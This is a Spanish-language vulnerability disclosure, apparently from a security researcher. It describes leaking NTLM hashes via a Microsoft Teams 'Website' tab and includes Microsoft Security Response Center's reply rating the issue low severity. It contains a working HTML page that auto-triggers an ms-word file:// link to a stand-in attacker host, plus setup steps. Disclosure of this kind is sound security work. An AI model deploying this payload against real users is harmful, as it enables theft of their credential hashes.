
Exfiltrar NTLM mediante la pestaña Sitio web en Teams a través de MS Office
Cuando un usuario navega a una pestaña "Website" que dirige a una página web especialmente diseñada, puede resultar en la exposición del hash NTLM mediante la activación de un esquema de URL de Office, reduciendo así el proceso a una ruta de un solo clic para la fuga.
Si se intenta abrir un enlace con el formato ms-word:ofv|u|file://Share/File.docx desde un navegador, se requieren los siguientes pasos:
1- El usuario debe confirmar su intención de abrir Word.
2- El usuario debe reconocer y aceptar los riesgos indicados en el mensaje de advertencia de MS Office.
Sin embargo, en la pestaña Website, la acción del usuario se simplifica a solo aceptar el riesgo.
<html>
<head>
<title>Auto Open Document</title>
</head>
<body>
<a href="ms-word:ofv|u|file://ResponderIP_Or_MachineName/File.docx" id="autoOpenLink"></a>
<script>
window.onload = function() {
document.getElementById('autoOpenLink').click();
};
</script>
</body>
</html>
3. En Teams, configura una pestaña "Website" que dirija a la página web que acabas de crear. 4. Accede a la "pestaña".
Cuando visitas la pestaña, un enlace activado por JavaScript inicia automáticamente la apertura de Word. Si el usuario acepta el aviso en Word haciendo clic en "Sí", su hash NTLM se transmite a la máquina del "atacante".

El mié., 27 de marzo de 2024, 20:23, Microsoft Security Response Center <[email protected]mailto:[[email protected]](mailto:[email protected])> escribió:
Hola,
Gracias por tu envío. Determinamos que tu hallazgo es válido, pero no cumple con nuestro criterio para un servicio inmediato porque la gravedad del problema es baja. Nuestros ingenieros indicaron que un usuario aún tendría que dar su consentimiento en Word u otros clientes de Office antes de que se filtre el NTLM, lo que reduce la gravedad. Sin embargo, hemos marcado tu hallazgo para una revisión futura como una oportunidad para mejorar nuestros productos y como un problema de funcionalidad a mejorar. No tengo un plazo para esta revisión. Como no se requiere ninguna acción adicional en este momento, cierro este caso.
Atentamente,
MSRC
Parece corregido en la versión 24033.813.2773.520. de Microsoft Teams.